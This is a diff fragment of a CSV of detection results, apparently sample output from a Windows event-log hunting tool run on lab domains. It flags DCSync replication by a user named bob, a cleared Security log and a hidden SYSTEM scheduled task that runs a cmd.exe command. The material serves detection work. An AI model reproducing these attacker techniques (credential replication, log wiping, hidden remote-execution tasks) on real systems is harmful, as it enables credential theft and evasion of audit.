+      <SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-500</SubjectUserSid>
+      <SubjectUserName>administrator</SubjectUserName>
+      <SubjectDomainName>insecurebank</SubjectDomainName>
+      <SubjectLogonId>0x218b896</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.024634Z"">
+    </TimeCreated>
+    <EventRecordID>198242594</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""3300"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">AF3067E0-BB6F-47C2-AA20-F3F458797F38</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.024634,2019-03-26T01:28:45.024634+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
+    </TimeCreated>
+    <EventRecordID>198242593</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""2868"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">57DCCD4C-7381-4371-8480-D74D47019AD8</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14674</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+schedule task created,1553508330.695604,2019-03-19T04:02:04.335561+04:00,,Audit,High,schedule task created by user,4698,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4698</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12804</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T00:02:04.319945Z"">
+    </TimeCreated>
+    <EventRecordID>566836</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""452"" ThreadID=""2836"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>WIN-77LTAPHIQ1R.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-21-1587066498-1489273250-1035260531-500</Data>
+    <Data Name=""SubjectUserName"">Administrator</Data>
+    <Data Name=""SubjectDomainName"">EXAMPLE</Data>
+    <Data Name=""SubjectLogonId"">0x17e2d2</Data>
+    <Data Name=""TaskName"">\CYAlyNSS</Data>
+    <Data Name=""TaskContent"">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-16&quot;?&gt; 
+&lt;Task version=&quot;1.2&quot; xmlns=&quot;http://schemas.microsoft.com/windows/2004/02/mit/task&quot;&gt; 
+  &lt;Triggers&gt; 
+    &lt;CalendarTrigger&gt; 
+      &lt;StartBoundary&gt;2015-07-15T20:35:13.2757294&lt;/StartBoundary&gt; 
+      &lt;Enabled&gt;true&lt;/Enabled&gt; 
+      &lt;ScheduleByDay&gt; 
+        &lt;DaysInterval&gt;1&lt;/DaysInterval&gt; 
+      &lt;/ScheduleByDay&gt; 
+    &lt;/CalendarTrigger&gt; 
+  &lt;/Triggers&gt; 
+  &lt;Principals&gt; 
+    &lt;Principal id=&quot;LocalSystem&quot;&gt; 
+      &lt;UserId&gt;S-1-5-18&lt;/UserId&gt; 
+      &lt;RunLevel&gt;HighestAvailable&lt;/RunLevel&gt; 
+      &lt;LogonType&gt;InteractiveToken&lt;/LogonType&gt; 
+    &lt;/Principal&gt; 
+  &lt;/Principals&gt; 
+  &lt;Settings&gt; 
+    &lt;MultipleInstancesPolicy&gt;IgnoreNew&lt;/MultipleInstancesPolicy&gt; 
+    &lt;DisallowStartIfOnBatteries&gt;false&lt;/DisallowStartIfOnBatteries&gt; 
+    &lt;StopIfGoingOnBatteries&gt;false&lt;/StopIfGoingOnBatteries&gt; 
+    &lt;AllowHardTerminate&gt;true&lt;/AllowHardTerminate&gt; 
+    &lt;RunOnlyIfNetworkAvailable&gt;false&lt;/RunOnlyIfNetworkAvailable&gt; 
+    &lt;IdleSettings&gt; 
+      &lt;StopOnIdleEnd&gt;true&lt;/StopOnIdleEnd&gt; 
+      &lt;RestartOnIdle&gt;false&lt;/RestartOnIdle&gt; 
+    &lt;/IdleSettings&gt; 
+    &lt;AllowStartOnDemand&gt;true&lt;/AllowStartOnDemand&gt; 
+    &lt;Enabled&gt;true&lt;/Enabled&gt; 
+    &lt;Hidden&gt;true&lt;/Hidden&gt; 
+    &lt;RunOnlyIfIdle&gt;false&lt;/RunOnlyIfIdle&gt; 
+    &lt;WakeToRun&gt;false&lt;/WakeToRun&gt; 
+    &lt;ExecutionTimeLimit&gt;P3D&lt;/ExecutionTimeLimit&gt; 
+    &lt;Priority&gt;7&lt;/Priority&gt; 
+  &lt;/Settings&gt; 
+  &lt;Actions Context=&quot;LocalSystem&quot;&gt; 
+    &lt;Exec&gt; 
+      &lt;Command&gt;cmd.exe&lt;/Command&gt; 
+      &lt;Arguments&gt;/C tasklist &amp;gt; %windir%\Temp\CYAlyNSS.tmp 2&amp;gt;&amp;amp;1&lt;/Arguments&gt; 
+    &lt;/Exec&gt; 
+  &lt;/Actions&gt; 
+&lt;/Task&gt;</Data>
+  </EventData>
+</Event>",WIN-77LTAPHIQ1R.example.corp,Security
+Audit log cleared,1552953724.335561,2019-03-25T14:05:30.695604+04:00,,Audit,Critical,Audit log cleared by user ( bob ),1102,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Eventlog"" Guid=""{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}"">
+    </Provider>
+    <EventID>1102</EventID>
+    <Version>0</Version>
+    <Level>4</Level>
+    <Task>104</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x4020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T09:09:14.916619Z"">
+    </TimeCreated>
+    <EventRecordID>198238040</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""744"" ThreadID=""2028"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <UserData>
+    <LogFileCleared xmlns=""http://manifests.microsoft.com/win/2004/08/windows/eventlog"">
+      <SubjectUserSid>S-1-5-21-738609754-2819869699-4189121830-1108</SubjectUserSid>
+      <SubjectUserName>bob</SubjectUserName>
+      <SubjectDomainName>insecurebank</SubjectDomainName>
+      <SubjectLogonId>0x8d7099</SubjectLogonId>
+    </LogFileCleared>
+  </UserData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
+    </TimeCreated>
+    <EventRecordID>198242592</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""896"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">57DCCD4C-7381-4371-8480-D74D47019AD8</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
+    <Data Name=""ObjectGUID"">C6FAF700-BFE4-452A-A766-424F84C29583</Data>
+    <Data Name=""ObjectClass"">domainDNS</Data>
+    <Data Name=""AttributeLDAPDisplayName"">nTSecurityDescriptor</Data>
+    <Data Name=""AttributeSyntaxOID"">2.5.5.15</Data>
+    <Data Name=""AttributeValue"">O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)</Data>
+    <Data Name=""OperationType"">%%14675</Data>
+  </EventData>
+</Event>",DC1.insecurebank.local,Security
+Dcsync Attack detected,1553549325.023629,2019-03-26T01:28:45.023629+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>5136</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>14081</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-25T21:28:45.023629Z"">
+    </TimeCreated>
+    <EventRecordID>198242591</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""444"" ThreadID=""3616"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>DC1.insecurebank.local</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""OpCorrelationID"">A1AA38AA-447E-46C2-ABA0-D205D4D8F873</Data>
+    <Data Name=""AppCorrelationID"">-</Data>
+    <Data Name=""SubjectUserSid"">S-1-5-21-738609754-2819869699-4189121830-1108</Data>
+    <Data Name=""SubjectUserName"">bob</Data>
+    <Data Name=""SubjectDomainName"">insecurebank</Data>
+    <Data Name=""SubjectLogonId"">0x40f2719</Data>
+    <Data Name=""DSName"">insecurebank.local</Data>
+    <Data Name=""DSType"">%%14676</Data>
+    <Data Name=""ObjectDN"">DC=insecurebank,DC=local</Data>
